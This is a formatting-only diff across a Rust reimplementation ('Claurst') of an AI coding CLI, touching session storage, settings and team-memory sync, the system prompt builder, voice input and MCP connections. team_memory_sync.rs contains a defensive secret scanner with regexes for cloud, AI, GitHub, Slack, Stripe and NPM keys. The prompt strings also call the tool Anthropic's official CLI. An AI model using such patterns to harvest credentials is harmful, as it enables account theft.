@@ -308,7 +304,8 @@ pub async fn load_transcript(path: &Path) -> crate::Result<Vec<TranscriptEntry>>
             continue;
         }
         // Cheap structural check before full parse.
-        if trimmed.contains("\"type\":\"tombstone\"") || trimmed.contains("\"type\": \"tombstone\"") {
+        if trimmed.contains("\"type\":\"tombstone\"") || trimmed.contains("\"type\": \"tombstone\"")
+        {
             if let Ok(entry) = serde_json::from_str::<TranscriptEntry>(trimmed) {
                 if let TranscriptEntry::Tombstone(t) = entry {
                     tombstoned.insert(t.deleted_uuid);
@@ -383,9 +380,7 @@ pub async fn list_sessions(project_root: &Path) -> crate::Result<Vec<SessionSumm
             Ok(m) => m,
             Err(_) => continue,
         };
-        let mtime = meta
-            .modified()
-            .unwrap_or(std::time::SystemTime::UNIX_EPOCH);
+        let mtime = meta.modified().unwrap_or(std::time::SystemTime::UNIX_EPOCH);
 
         // Read the tail of the file (up to 64 KB) to extract metadata.
         let (last_prompt, title) = read_session_tail_metadata(&path).await;
@@ -449,10 +444,7 @@ async fn read_session_tail_metadata(path: &Path) -> (Option<String>, Option<Stri
 
     use tokio::io::{AsyncReadExt, AsyncSeekExt};
     let mut file = file;
-    if let Err(_) = file
-        .seek(std::io::SeekFrom::Start(offset))
-        .await
-    {
+    if let Err(_) = file.seek(std::io::SeekFrom::Start(offset)).await {
         return (None, None);
     }
     if let Err(_) = file.read_exact(&mut buf).await {
@@ -562,9 +554,7 @@ pub fn messages_from_transcript(entries: &[TranscriptEntry]) -> Vec<Message> {
     entries
         .iter()
         .filter_map(|e| match e {
-            TranscriptEntry::User(m) | TranscriptEntry::Assistant(m) => {
-                Some(m.message.clone())
-            }
+            TranscriptEntry::User(m) | TranscriptEntry::Assistant(m) => Some(m.message.clone()),
             _ => None,
         })
         .collect()
@@ -577,8 +567,8 @@ pub fn messages_from_transcript(entries: &[TranscriptEntry]) -> Vec<Message> {
 #[cfg(test)]
 mod tests {
     use super::*;
-    use tempfile::tempdir;
     use crate::types::{Message, MessageContent, Role};
+    use tempfile::tempdir;
 
     fn make_msg(role: Role) -> Message {
         Message {

--- a/src-rust/crates/core/src/session_tracing.rs
+++ b/src-rust/crates/core/src/session_tracing.rs
@@ -53,19 +53,12 @@ pub fn end_interaction_span(_span: Arc<NoopSpan>) {}
 /// Start an LLM request span (traces API calls).
 /// Normally tracks TTFT, token counts, model, fast-mode status.
 /// In free builds, this is a no-op.
-pub fn start_llm_request_span(
-    _model: &str,
-    _max_tokens: u32,
-) -> Arc<NoopSpan> {
+pub fn start_llm_request_span(_model: &str, _max_tokens: u32) -> Arc<NoopSpan> {
     Arc::new(NoopSpan::new())
 }
 
 /// End an LLM request span (no-op).
-pub fn end_llm_request_span(
-    _span: Arc<NoopSpan>,
-    _input_tokens: u32,
-    _output_tokens: u32,
-) {}
+pub fn end_llm_request_span(_span: Arc<NoopSpan>, _input_tokens: u32, _output_tokens: u32) {}
 
 /// Start a tool execution span.
 pub fn start_tool_span(_tool_name: &str) -> Arc<NoopSpan> {
@@ -73,11 +66,7 @@ pub fn start_tool_span(_tool_name: &str) -> Arc<NoopSpan> {
 }
 
 /// End a tool execution span (no-op).
-pub fn end_tool_span(
-    _span: Arc<NoopSpan>,
-    _success: bool,
-    _error: Option<&str>,
-) {}
+pub fn end_tool_span(_span: Arc<NoopSpan>, _success: bool, _error: Option<&str>) {}
 
 /// Start a permission dialog span.
 pub fn start_permission_span(_tool_name: &str) -> Arc<NoopSpan> {

--- a/src-rust/crates/core/src/settings_sync.rs
+++ b/src-rust/crates/core/src/settings_sync.rs
@@ -200,18 +200,13 @@ impl SettingsSyncManager {
     ///
     /// Writes settings and memory files to the appropriate local paths,
     /// enforcing the 500 KB per-file size limit.
-    pub async fn apply_to_local(
-        &self,
-        data: &SyncedData,
-        project_id: Option<&str>,
-    ) -> ApplyResult {
+    pub async fn apply_to_local(&self, data: &SyncedData, project_id: Option<&str>) -> ApplyResult {
         let mut result = ApplyResult::default();
 
         // Global user settings
         if let Some(ref settings_json) = data.settings {
             let path = claude_config_dir().join("settings.json");
-            let content = serde_json::to_string_pretty(settings_json)
-                .unwrap_or_default();
+            let content = serde_json::to_string_pretty(settings_json).unwrap_or_default();
             match write_file_for_sync(&path, &content).await {
                 Ok(()) => {
                     result.settings_written = true;
@@ -297,7 +292,10 @@ impl SettingsSyncManager {
             return Ok(());
         }
 
-        debug!(count = changed.len(), "Settings sync: uploading changed entries");
+        debug!(
+            count = changed.len(),
+            "Settings sync: uploading changed entries"
+        );
         self.put_entries(changed).await
     }
 
@@ -481,10 +479,7 @@ mod tests {
             SYNC_KEY_USER_SETTINGS.to_string(),
             r#"{"model":"claude-3"}"#.to_string(),
         );
-        entries.insert(
-            SYNC_KEY_USER_MEMORY.to_string(),
-            "# My notes".to_string(),
-        );
+        entries.insert(SYNC_KEY_USER_MEMORY.to_string(), "# My notes".to_string());
 
         let data = entries_to_synced_data(entries);
         assert!(data.settings.is_some());
@@ -498,10 +493,7 @@ mod tests {
     #[test]
     fn test_entries_to_synced_data_invalid_json_settings() {
         let mut entries = HashMap::new();
-        entries.insert(
-            SYNC_KEY_USER_SETTINGS.to_string(),
-            "not-json".to_string(),
-        );
+        entries.insert(SYNC_KEY_USER_SETTINGS.to_string(), "not-json".to_string());
         let data = entries_to_synced_data(entries);
         // Malformed settings JSON → field is None (graceful degradation)
         assert!(data.settings.is_none());

--- a/src-rust/crates/core/src/skill_discovery.rs
+++ b/src-rust/crates/core/src/skill_discovery.rs
@@ -216,10 +216,7 @@ fn fetch_git_skills(url: &str) -> Option<Vec<DiscoveredSkill>> {
     let cache_dir = dirs::cache_dir()?.join("claurst").join("skills");
 
     // Use the last path segment of the URL as the local directory name.
-    let repo_name = url
-        .split('/')
-        .last()?
-        .trim_end_matches(".git");
+    let repo_name = url.split('/').last()?.trim_end_matches(".git");
 
     if repo_name.is_empty() {
         tracing::warn!(url, "skill_discovery: cannot derive repo name from git URL");
@@ -293,7 +290,8 @@ mod tests {
 
     #[test]
     fn test_parse_with_frontmatter() {
-        let content = "---\nname: review\ndescription: Review code changes\n---\n\nPlease review $ARGUMENTS";
+        let content =
+            "---\nname: review\ndescription: Review code changes\n---\n\nPlease review $ARGUMENTS";
         let path = PathBuf::from("review.md");
         let skill = parse_skill_file(content, &path).unwrap();
         assert_eq!(skill.name, "review");
@@ -339,7 +337,11 @@ mod tests {
     #[test]
     fn test_scan_dir_finds_skills() {
         let tmp = make_temp_dir();
-        write_file(tmp.path(), "review.md", "---\nname: review\n---\nReview $ARGUMENTS");
+        write_file(
+            tmp.path(),
+            "review.md",
+            "---\nname: review\n---\nReview $ARGUMENTS",
+        );
         write_file(tmp.path(), "debug.md", "Debug help.");
         write_file(tmp.path(), "not-md.txt", "ignored");
 
@@ -363,7 +365,11 @@ mod tests {
         let tmp = make_temp_dir();
         let skills_dir = tmp.path().join(".claurst").join("skills");
         std::fs::create_dir_all(&skills_dir).unwrap();
-        write_file(&skills_dir, "myskill.md", "---\nname: myskill\ndescription: Test\n---\nDo it.");
+        write_file(
+            &skills_dir,
+            "myskill.md",
+            "---\nname: myskill\ndescription: Test\n---\nDo it.",
+        );
 
         let config = crate::config::SkillsConfig::default();
         let discovered = discover_skills(tmp.path(), &config);
@@ -375,7 +381,11 @@ mod tests {
     fn test_discover_extra_paths() {
         let tmp = make_temp_dir();
         let extra = make_temp_dir();
-        write_file(extra.path(), "extra.md", "---\nname: extra\n---\nExtra skill.");
+        write_file(
+            extra.path(),
+            "extra.md",
+            "---\nname: extra\n---\nExtra skill.",
+        );
 
         let config = crate::config::SkillsConfig {
             paths: vec![extra.path().to_str().unwrap().to_string()],
@@ -390,10 +400,18 @@ mod tests {
         let tmp = make_temp_dir();
         let proj_skills = tmp.path().join(".claurst").join("skills");
         std::fs::create_dir_all(&proj_skills).unwrap();
-        write_file(&proj_skills, "dup.md", "---\nname: dup\ndescription: project\n---\nProject.");
+        write_file(
+            &proj_skills,
+            "dup.md",
+            "---\nname: dup\ndescription: project\n---\nProject.",
+        );
 
         let extra = make_temp_dir();
-        write_file(extra.path(), "dup.md", "---\nname: dup\ndescription: extra\n---\nExtra.");
+        write_file(
+            extra.path(),
+            "dup.md",
+            "---\nname: dup\ndescription: extra\n---\nExtra.",
+        );
 
         let config = crate::config::SkillsConfig {
             paths: vec![extra.path().to_str().unwrap().to_string()],

--- a/src-rust/crates/core/src/status_notices.rs
+++ b/src-rust/crates/core/src/status_notices.rs
@@ -25,7 +25,11 @@ pub struct StatusNotice {
 }
 
 impl StatusNotice {
-    pub fn new(id: impl Into<String>, message: impl Into<String>, priority: NoticePriority) -> Self {
+    pub fn new(
+        id: impl Into<String>,
+        message: impl Into<String>,
+        priority: NoticePriority,
+    ) -> Self {
         Self {
             id: id.into(),
             message: message.into(),
@@ -78,13 +82,19 @@ pub fn compact_warning_notice(fill_pct: f64) -> StatusNotice {
     if fill_pct >= 0.95 {
         StatusNotice::new(
             notice_ids::COMPACT_CRITICAL,
-            format!("Context {:.0}% full — run /compact now to avoid data loss", fill_pct * 100.0),
+            format!(
+                "Context {:.0}% full — run /compact now to avoid data loss",
+                fill_pct * 100.0
+            ),
             NoticePriority::Critical,
         )
     } else {
         StatusNotice::new(
             notice_ids::COMPACT_WARNING,
-            format!("Context {:.0}% full — consider running /compact", fill_pct * 100.0),
+            format!(
+                "Context {:.0}% full — consider running /compact",
+                fill_pct * 100.0
+            ),
             NoticePriority::High,
         )
     }

--- a/src-rust/crates/core/src/system_prompt.rs
+++ b/src-rust/crates/core/src/system_prompt.rs
@@ -5,8 +5,8 @@
 //! volatile, session-specific sections follow it.
 
 use serde::{Deserialize, Serialize};
-use std::sync::{Mutex, OnceLock};
 use std::collections::HashMap;
+use std::sync::{Mutex, OnceLock};
 
 // ---------------------------------------------------------------------------
 // Dynamic boundary marker
@@ -47,7 +47,11 @@ pub struct SystemPromptSection {
 impl SystemPromptSection {
     /// Create a memoizable (cacheable) section.
     pub fn cached(tag: &'static str, content: impl Into<String>) -> Self {
-        Self { tag, content: Some(content.into()), cache_break: false }
+        Self {
+            tag,
+            content: Some(content.into()),
+            cache_break: false,
+        }
     }
 
     /// Create a volatile section that re-evaluates every turn.
@@ -97,9 +101,9 @@ impl OutputStyle {
                 "Be maximally concise. Skip preamble, summaries, and filler. \
                 Lead with the answer. One sentence is better than three.",
             ),
-            OutputStyle::Formal => Some(
-                "Maintain a formal, professional tone. Use precise technical language.",
-            ),
+            OutputStyle::Formal => {
+                Some("Maintain a formal, professional tone. Use precise technical language.")
+            }
             OutputStyle::Casual => Some("Use a casual, conversational tone."),
             OutputStyle::Default => None,
         }
@@ -180,9 +184,7 @@ impl SystemPromptPrefix {
                 "You are Claurst, Anthropic's official CLI for Claude, \
                 running within the Claude Agent SDK."
             }
-            Self::Sdk => {
-                "You are a Claude agent, built on Anthropic's Claude Agent SDK."
-            }
+            Self::Sdk => "You are a Claude agent, built on Anthropic's Claude Agent SDK.",
         }
     }
 }
@@ -240,14 +242,9 @@ pub fn build_system_prompt(opts: &SystemPromptOptions) -> String {
         }
     }
 
-    let prefix = opts
-        .prefix
-        .unwrap_or_else(|| {
-            SystemPromptPrefix::detect(
-                opts.is_non_interactive,
-                opts.has_append_system_prompt,
-            )
-        });
+    let prefix = opts.prefix.unwrap_or_else(|| {
+        SystemPromptPrefix::detect(opts.is_non_interactive, opts.has_append_system_prompt)
+    });
 
     let mut parts: Vec<String> = Vec::new();
 
@@ -315,10 +312,7 @@ pub fn build_system_prompt(opts: &SystemPromptOptions) -> String {
 
     // 12. Memory injection (from memdir)
     if !opts.memory_content.is_empty() {
-        parts.push(format!(
-            "\n<memory>\n{}\n</memory>",
-            opts.memory_content
-        ));
+        parts.push(format!("\n<memory>\n{}\n</memory>", opts.memory_content));
     }
 
     // 13. Appended system prompt (--append-system-prompt)
@@ -546,7 +540,10 @@ mod tests {
     #[test]
     fn test_default_prompt_contains_attribution() {
         let prompt = build_system_prompt(&default_opts());
-        assert!(prompt.contains("Claurst"), "Default prompt must contain attribution");
+        assert!(
+            prompt.contains("Claurst"),
+            "Default prompt must contain attribution"
+        );
     }
 
     #[test]

--- a/src-rust/crates/core/src/team_memory_sync.rs
+++ b/src-rust/crates/core/src/team_memory_sync.rs
@@ -6,11 +6,11 @@
 //!
 //! Pull is server-wins: remote content overwrites local files unconditionally.
 
-use std::collections::HashMap;
-use std::path::PathBuf;
 use anyhow::{Context, Result};
 use serde::{Deserialize, Serialize};
-use sha2::{Sha256, Digest};
+use sha2::{Digest, Sha256};
+use std::collections::HashMap;
+use std::path::PathBuf;
 
 // ---------------------------------------------------------------------------
 // Constants
@@ -125,7 +125,12 @@ pub struct TeamMemorySync {
 
 impl TeamMemorySync {
     pub fn new(api_base: String, repo: String, token: String, team_dir: PathBuf) -> Self {
-        Self { api_base, repo, token, team_dir }
+        Self {
+            api_base,
+            repo,
+            token,
+            team_dir,
+        }
     }
 
     // -----------------------------------------------------------------------
@@ -162,11 +167,7 @@ impl TeamMemorySync {
         }
 
         // Capture ETag before consuming the response body
-        if let Some(etag) = response
-            .headers()
-            .get("etag")
-            .and_then(|v| v.to_str().ok())
-        {
+        if let Some(etag) = response.headers().get("etag").and_then(|v| v.to_str().ok()) {
             state.last_known_etag = Some(etag.to_string());
         }
 
@@ -221,11 +222,7 @@ impl TeamMemorySync {
         let changed: Vec<TeamMemoryEntry> = local_entries
             .into_iter()
             .filter(|entry| {
-                state
-                    .server_checksums
-                    .get(&entry.key)
-                    .map(|s| s.as_str())
-                    != Some(&entry.checksum)
+                state.server_checksums.get(&entry.key).map(|s| s.as_str()) != Some(&entry.checksum)
             })
             .collect();
 
@@ -286,11 +283,7 @@ impl TeamMemorySync {
         batches
     }
 
-    async fn upload_batch(
-        &self,
-        batch: Vec<TeamMemoryEntry>,
-        state: &mut SyncState,
-    ) -> Result<()> {
+    async fn upload_batch(&self, batch: Vec<TeamMemoryEntry>, state: &mut SyncState) -> Result<()> {
         let client = reqwest::Client::new();
         let url = format!(
             "{}/api/claude_code/team_memory?repo={}",
@@ -300,10 +293,7 @@ impl TeamMemorySync {
 
         let body = serde_json::json!({ "entries": batch });
 
-        let mut req = client
-            .put(&url)
-            .bearer_auth(&self.token)
-            .json(&body);
+        let mut req = client.put(&url).bearer_auth(&self.token).json(&body);
 
         if let Some(etag) = &state.last_known_etag {
             req = req.header("If-Match", etag);
@@ -318,11 +308,7 @@ impl TeamMemorySync {
 
         match status {
             200 | 201 | 204 => {
-                if let Some(etag) = response
-                    .headers()
-                    .get("etag")
-                    .and_then(|v| v.to_str().ok())
-                {
+                if let Some(etag) = response.headers().get("etag").and_then(|v| v.to_str().ok()) {
                     state.last_known_etag = Some(etag.to_string());
                 }
                 // Update local checksum map to reflect uploaded state
@@ -376,7 +362,11 @@ impl TeamMemorySync {
                         .replace('\\', "/");
 
                     let checksum = content_checksum(&content);
-                    entries.push(TeamMemoryEntry { key, content, checksum });
+                    entries.push(TeamMemoryEntry {
+                        key,
+                        content,
+                        checksum,
+                    });
                 }
             }
         }
@@ -406,12 +396,21 @@ pub fn scan_for_secrets(content: &str) -> Vec<SecretMatch> {
     // Patterns ordered by likelihood of appearing in dev-team memory content.
     const PATTERNS: &[(&str, &str)] = &[
         // Cloud providers
-        (r"(?:A3T[A-Z0-9]|AKIA|ASIA|ABIA|ACCA)[A-Z2-7]{16}", "AWS access key"),
+        (
+            r"(?:A3T[A-Z0-9]|AKIA|ASIA|ABIA|ACCA)[A-Z2-7]{16}",
+            "AWS access key",
+        ),
         (r"AIza[\w-]{35}", "GCP API key"),
         // AI APIs
         (r"sk-ant-api03-[a-zA-Z0-9_\-]{93}AA", "Anthropic API key"),
-        (r"sk-ant-admin01-[a-zA-Z0-9_\-]{93}AA", "Anthropic admin API key"),
-        (r"sk-[a-zA-Z0-9]{20}T3BlbkFJ[a-zA-Z0-9]{20}", "OpenAI API key"),
+        (
+            r"sk-ant-admin01-[a-zA-Z0-9_\-]{93}AA",
+            "Anthropic admin API key",
+        ),
+        (
+            r"sk-[a-zA-Z0-9]{20}T3BlbkFJ[a-zA-Z0-9]{20}",
+            "OpenAI API key",
+        ),
         // Version control
         (r"ghp_[0-9a-zA-Z]{36}", "GitHub personal access token"),
         (r"github_pat_\w{82}", "GitHub fine-grained PAT"),
@@ -419,11 +418,17 @@ pub fn scan_for_secrets(content: &str) -> Vec<SecretMatch> {
         (r"gho_[0-9a-zA-Z]{36}", "GitHub OAuth token"),
         (r"glpat-[\w-]{20}", "GitLab PAT"),
         // Communication
-        (r"xoxb-[0-9]{10,13}-[0-9]{10,13}[a-zA-Z0-9-]*", "Slack bot token"),
+        (
+            r"xoxb-[0-9]{10,13}-[0-9]{10,13}[a-zA-Z0-9-]*",
+            "Slack bot token",
+        ),
         // Crypto / private keys
         (r"-----BEGIN[ A-Z0-9_-]{0,100}PRIVATE KEY", "Private key"),
         // Payments
-        (r"(?:sk|rk)_(?:test|live|prod)_[a-zA-Z0-9]{10,99}", "Stripe secret key"),
+        (
+            r"(?:sk|rk)_(?:test|live|prod)_[a-zA-Z0-9]{10,99}",
+            "Stripe secret key",
+        ),
         // NPM
         (r"npm_[a-zA-Z0-9]{36}", "NPM access token"),
     ];
@@ -434,7 +439,9 @@ pub fn scan_for_secrets(content: &str) -> Vec<SecretMatch> {
         // Lazily compile; the fn is not hot enough to warrant a static cache here
         if let Ok(re) = regex::Regex::new(pattern) {
             if re.is_match(content) {
-                findings.push(SecretMatch { label: label.to_string() });
+                findings.push(SecretMatch {
+                    label: label.to_string(),
+                });
             }
         }
     }
@@ -456,7 +463,10 @@ mod tests {
     #[test]
     fn test_checksum_format() {
         let cs = content_checksum("hello");
-        assert!(cs.starts_with("sha256:"), "checksum should start with sha256:");
+        assert!(
+            cs.starts_with("sha256:"),
+            "checksum should start with sha256:"
+        );
         assert_eq!(cs.len(), "sha256:".len() + 64, "sha256 hex is 64 chars");
     }
 
@@ -535,7 +545,11 @@ mod tests {
     fn entry(key: &str, size: usize) -> TeamMemoryEntry {
         let content = "x".repeat(size);
         let checksum = content_checksum(&content);
-        TeamMemoryEntry { key: key.to_string(), content, checksum }
+        TeamMemoryEntry {
+            key: key.to_string(),
+            content,
+            checksum,
+        }
     }
 
     #[test]
@@ -632,8 +646,12 @@ mod tests {
     #[tokio::test]
     async fn test_scan_local_files_finds_md() {
         let tmp = TempDir::new().unwrap();
-        tokio::fs::write(tmp.path().join("MEMORY.md"), "# Memory").await.unwrap();
-        tokio::fs::write(tmp.path().join("ignore.txt"), "not md").await.unwrap();
+        tokio::fs::write(tmp.path().join("MEMORY.md"), "# Memory")
+            .await
+            .unwrap();
+        tokio::fs::write(tmp.path().join("ignore.txt"), "not md")
+            .await
+            .unwrap();
 
         let sync = TeamMemorySync::new(
             "https://example.com".to_string(),
@@ -649,9 +667,15 @@ mod tests {
     #[tokio::test]
     async fn test_scan_local_files_sorted() {
         let tmp = TempDir::new().unwrap();
-        tokio::fs::write(tmp.path().join("z.md"), "z").await.unwrap();
-        tokio::fs::write(tmp.path().join("a.md"), "a").await.unwrap();
-        tokio::fs::write(tmp.path().join("m.md"), "m").await.unwrap();
+        tokio::fs::write(tmp.path().join("z.md"), "z")
+            .await
+            .unwrap();
+        tokio::fs::write(tmp.path().join("a.md"), "a")
+            .await
+            .unwrap();
+        tokio::fs::write(tmp.path().join("m.md"), "m")
+            .await
+            .unwrap();
 
         let sync = TeamMemorySync::new(
             "https://example.com".to_string(),
@@ -668,7 +692,9 @@ mod tests {
     async fn test_scan_local_files_checksums_match() {
         let tmp = TempDir::new().unwrap();
         let content = "# Hello world";
-        tokio::fs::write(tmp.path().join("MEMORY.md"), content).await.unwrap();
+        tokio::fs::write(tmp.path().join("MEMORY.md"), content)
+            .await
+            .unwrap();
 
         let sync = TeamMemorySync::new(
             "https://example.com".to_string(),

--- a/src-rust/crates/core/src/tips.rs
+++ b/src-rust/crates/core/src/tips.rs
@@ -329,10 +329,7 @@ mod tests {
                 "tip '{}' has empty content",
                 tip.id
             );
-            assert!(
-                !tip.id.is_empty(),
-                "a tip has an empty id"
-            );
+            assert!(!tip.id.is_empty(), "a tip has an empty id");
         }
     }
 
@@ -340,11 +337,7 @@ mod tests {
     fn all_tip_ids_unique() {
         let mut ids = std::collections::HashSet::new();
         for tip in all_tips() {
-            assert!(
-                ids.insert(tip.id),
-                "duplicate tip id: {}",
-                tip.id
-            );
+            assert!(ids.insert(tip.id), "duplicate tip id: {}", tip.id);
         }
     }
 
@@ -379,7 +372,10 @@ mod tests {
         // Use a very large session number so sessions_since is always >= cooldown
         // regardless of any real on-disk history (avoids test/disk coupling).
         let result = select_tip(1_000_000);
-        assert!(result.is_some(), "select_tip should return a tip for a large session number");
+        assert!(
+            result.is_some(),
+            "select_tip should return a tip for a large session number"
+        );
     }
 
     #[test]

--- a/src-rust/crates/core/src/token_budget.rs
+++ b/src-rust/crates/core/src/token_budget.rs
@@ -119,9 +119,18 @@ mod tests {
 
     #[test]
     fn warning_levels() {
-        assert_eq!(TokenBudget::new(79_000, 100_000).warning_level, TokenWarningLevel::None);
-        assert_eq!(TokenBudget::new(80_000, 100_000).warning_level, TokenWarningLevel::Warning);
-        assert_eq!(TokenBudget::new(95_000, 100_000).warning_level, TokenWarningLevel::Critical);
+        assert_eq!(
+            TokenBudget::new(79_000, 100_000).warning_level,
+            TokenWarningLevel::None
+        );
+        assert_eq!(
+            TokenBudget::new(80_000, 100_000).warning_level,
+            TokenWarningLevel::Warning
+        );
+        assert_eq!(
+            TokenBudget::new(95_000, 100_000).warning_level,
+            TokenWarningLevel::Critical
+        );
     }
 
     #[test]

--- a/src-rust/crates/core/src/truncate.rs
+++ b/src-rust/crates/core/src/truncate.rs
@@ -22,7 +22,11 @@ pub fn truncate_lines(lines: &[String], max_lines: usize) -> (Vec<String>, bool)
     }
     let mut out = lines[..max_lines].to_vec();
     let remaining = lines.len() - max_lines;
-    out.push(format!("… {} more line{}", remaining, if remaining == 1 { "" } else { "s" }));
+    out.push(format!(
+        "… {} more line{}",
+        remaining,
+        if remaining == 1 { "" } else { "s" }
+    ));
     (out, true)
 }
 

--- a/src-rust/crates/core/src/update_check.rs
+++ b/src-rust/crates/core/src/update_check.rs
@@ -113,9 +113,7 @@ fn update_cache_path() -> Option<std::path::PathBuf> {
 
 /// Compare two semver strings.  Returns `true` when `latest` > `current`.
 fn is_newer(latest: &str, current: &str) -> bool {
-    let parse = |v: &str| -> Vec<u32> {
-        v.split('.').filter_map(|p| p.parse().ok()).collect()
-    };
+    let parse = |v: &str| -> Vec<u32> { v.split('.').filter_map(|p| p.parse().ok()).collect() };
     let l = parse(latest);
     let c = parse(current);
     let max_len = l.len().max(c.len());

--- a/src-rust/crates/core/src/voice.rs
+++ b/src-rust/crates/core/src/voice.rs
@@ -40,7 +40,9 @@ pub enum VoiceAvailability {
     /// Feature flag not enabled in this build
     NotEnabled,
     /// No microphone / audio device available on this system
-    NoMicrophone { reason: String },
+    NoMicrophone {
+        reason: String,
+    },
     /// Voice input is enabled but the user has toggled it off
     ToggledOff,
 }
@@ -57,8 +59,7 @@ impl VoiceAvailability {
         match self {
             VoiceAvailability::Available => None,
             VoiceAvailability::RequiresOAuth => Some(
-                "Voice mode requires OAuth authentication. Run /login to authenticate."
-                    .to_string(),
+                "Voice mode requires OAuth authentication. Run /login to authenticate.".to_string(),
             ),
             VoiceAvailability::MissingScopes { required, have } => Some(format!(
                 "Voice mode requires scopes: {}. Your token has: {}",
@@ -69,16 +70,14 @@ impl VoiceAvailability {
                     have.join(", ")
                 }
             )),
-            VoiceAvailability::Disabled => {
-                Some("Voice mode is currently disabled.".to_string())
-            }
+            VoiceAvailability::Disabled => Some("Voice mode is currently disabled.".to_string()),
             VoiceAvailability::NotEnabled => {
                 Some("Voice mode is not enabled in this build.".to_string())
             }
             VoiceAvailability::NoMicrophone { reason } => Some(reason.clone()),
-            VoiceAvailability::ToggledOff => Some(
-                "Voice input is disabled. Run /voice to enable.".to_string(),
-            ),
+            VoiceAvailability::ToggledOff => {
+                Some("Voice input is disabled. Run /voice to enable.".to_string())
+            }
         }
     }
 }
@@ -316,8 +315,7 @@ async fn record_and_transcribe(
 ) -> anyhow::Result<()> {
     #[cfg(feature = "voice")]
     {
-        let (samples, sample_rate) =
-            record_audio(is_recording, event_tx.clone()).await?;
+        let (samples, sample_rate) = record_audio(is_recording, event_tx.clone()).await?;
 
         let _ = event_tx.send(VoiceEvent::RecordingStopped).await;
 
@@ -361,7 +359,8 @@ async fn record_and_transcribe(
     {
         let _ = is_recording;
         let _ = config;
-        let msg = "Voice recording is not available in this build (compile with --features voice).".to_string();
+        let msg = "Voice recording is not available in this build (compile with --features voice)."
+            .to_string();
         let _ = event_tx.send(VoiceEvent::Error(msg.clone())).await;
         Err(anyhow::anyhow!(msg))
     }
@@ -402,8 +401,7 @@ async fn record_audio(
                     s.extend_from_slice(data);
                 } else {
                     for chunk in data.chunks(channels) {
-                        let mono =
-                            chunk.iter().copied().sum::<f32>() / channels as f32;
+                        let mono = chunk.iter().copied().sum::<f32>() / channels as f32;
                         s.push(mono);
                     }
                 }
@@ -485,8 +483,7 @@ async fn transcribe_audio(
 ) -> anyhow::Result<String> {
     let wav_data = encode_wav(audio_samples, sample_rate)?;
 
-    let url = endpoint_url
-        .unwrap_or("https://api.openai.com/v1/audio/transcriptions");
+    let url = endpoint_url.unwrap_or("https://api.openai.com/v1/audio/transcriptions");
 
     let client = reqwest::Client::builder()
         .timeout(std::time::Duration::from_secs(60))
@@ -522,11 +519,7 @@ async fn transcribe_audio(
     }
 
     let json: serde_json::Value = response.json().await?;
-    let text = json["text"]
-        .as_str()
-        .unwrap_or("")
-        .trim()
-        .to_string();
+    let text = json["text"].as_str().unwrap_or("").trim().to_string();
     Ok(text)
 }
 

--- a/src-rust/crates/core/tests/parity_smoke.rs
+++ b/src-rust/crates/core/tests/parity_smoke.rs
@@ -2,11 +2,11 @@
 //! Verifies that core data structures are usable as the TS CLI would use them.
 
 use claurst_core::{
-    session_storage::{TranscriptEntry, transcript_dir},
-    prompt_history::HistoryEntry,
-    file_history::FileHistory,
     claudemd::load_all_memory_files,
+    file_history::FileHistory,
     message_utils::{estimate_tokens, get_message_text, is_tool_use_message},
+    prompt_history::HistoryEntry,
+    session_storage::{transcript_dir, TranscriptEntry},
     types::{Message, MessageContent, Role},
 };
 use std::path::PathBuf;

--- a/src-rust/crates/core/tests/test_mcp_templates.rs
+++ b/src-rust/crates/core/tests/test_mcp_templates.rs
@@ -21,10 +21,8 @@ fn test_nested_path() {
             "version": "1.0"
         }
     });
-    let result = TemplateRenderer::render(
-        "Created by {{meta.author}} (v{{meta.version}})",
-        &context,
-    );
+    let result =
+        TemplateRenderer::render("Created by {{meta.author}} (v{{meta.version}})", &context);
     assert_eq!(result, "Created by Alice (v1.0)");
 }
 

--- a/src-rust/crates/mcp/src/connection_manager.rs
+++ b/src-rust/crates/mcp/src/connection_manager.rs
@@ -31,10 +31,7 @@ pub enum McpServerStatus {
     /// Cleanly disconnected (or not yet attempted).
     Disconnected { last_error: Option<String> },
     /// Connection failed; a retry is scheduled.
-    Failed {
-        error: String,
-        retry_at: Instant,
-    },
+    Failed { error: String, retry_at: Instant },
 }
 
 impl McpServerStatus {
@@ -42,11 +39,17 @@ impl McpServerStatus {
     pub fn display(&self) -> String {
         match self {
             McpServerStatus::Connected { tool_count } => {
-                format!("connected ({} tool{})", tool_count, if *tool_count == 1 { "" } else { "s" })
+                format!(
+                    "connected ({} tool{})",
+                    tool_count,
+                    if *tool_count == 1 { "" } else { "s" }
+                )
             }
             McpServerStatus::Connecting => "connecting…".to_string(),
             McpServerStatus::Disconnected { last_error: None } => "disconnected".to_string(),
-            McpServerStatus::Disconnected { last_error: Some(e) } => {
+            McpServerStatus::Disconnected {
+                last_error: Some(e),
+            } => {
                 format!("disconnected ({})", e)
             }
             McpServerStatus::Failed { error, retry_at } => {
@@ -158,7 +161,11 @@ impl McpConnectionManager {
                 st.status = McpServerStatus::Disconnected {
                     last_error: Some(msg.clone()),
                 };
-                Err(anyhow::anyhow!("MCP server '{}' connection failed: {}", name, msg))
+                Err(anyhow::anyhow!(
+                    "MCP server '{}' connection failed: {}",
+                    name,
+                    msg
+                ))
             }
         }
     }
@@ -276,10 +283,7 @@ impl McpConnectionManager {
     }
 
     /// Background loop: wait, then attempt reconnect with exponential backoff.
-    async fn reconnect_loop(
-        name: String,
-        state: Arc<DashMap<String, Arc<Mutex<ServerState>>>>,
-    ) {
+    async fn reconnect_loop(name: String, state: Arc<DashMap<String, Arc<Mutex<ServerState>>>>) {
         let mut backoff = Duration::from_secs(1);
         const MAX_BACKOFF: Duration = Duration::from_secs(60);
 
@@ -290,7 +294,9 @@ impl McpConnectionManager {
             if let Some(entry) = state.get(&name) {
                 if let Ok(mut st) = entry.value().try_lock() {
                     let prev_error = match &st.status {
-                        McpServerStatus::Disconnected { last_error: Some(e) } => e.clone(),
+                        McpServerStatus::Disconnected {
+                            last_error: Some(e),
+                        } => e.clone(),
                         McpServerStatus::Failed { error, .. } => error.clone(),
                         _ => "connection lost".to_string(),
                     };

--- a/src-rust/crates/mcp/src/lib.rs
+++ b/src-rust/crates/mcp/src/lib.rs
@@ -30,12 +30,12 @@ use tokio_stream::wrappers::ReceiverStream;
 use tracing::{debug, error, info, warn};
 
 pub use client::McpClient;
-pub use types::*;
 pub use connection_manager::{McpConnectionManager, McpServerStatus};
+pub use types::*;
 
 pub mod connection_manager;
-pub mod registry;
 pub mod oauth;
+pub mod registry;
 
 // ---------------------------------------------------------------------------
 // Environment variable expansion
@@ -79,7 +79,8 @@ pub fn expand_env_vars(input: &str) -> String {
                             },
                         };
 
